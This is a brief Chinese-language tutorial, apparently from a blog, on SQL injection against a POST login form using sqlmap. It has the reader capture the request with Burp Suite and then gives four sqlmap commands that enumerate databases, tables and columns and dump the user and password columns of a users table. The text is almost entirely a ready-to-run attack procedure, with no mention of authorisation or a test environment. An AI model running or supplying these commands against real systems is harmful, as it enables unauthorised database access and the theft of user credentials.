用 sqlmap 执行 POST 表单的注入
-
用 Burp Suite 截取表单,保存为 test.txt
-
根据username字段进行注入,目标为得到数据库列表
1
sqlmap -r test.txt -p username --dbs
-
选择一个数据库,猜表
1
sqlmap -r test.txt -p username -D userdb --tables
-
猜列
1
sqlmap -r test.txt -p username -D userdb -T users --columns
-
猜数据
1
sqlmap -r test.txt -p username -D userdb -T users -C "user,password" --dump
近期评论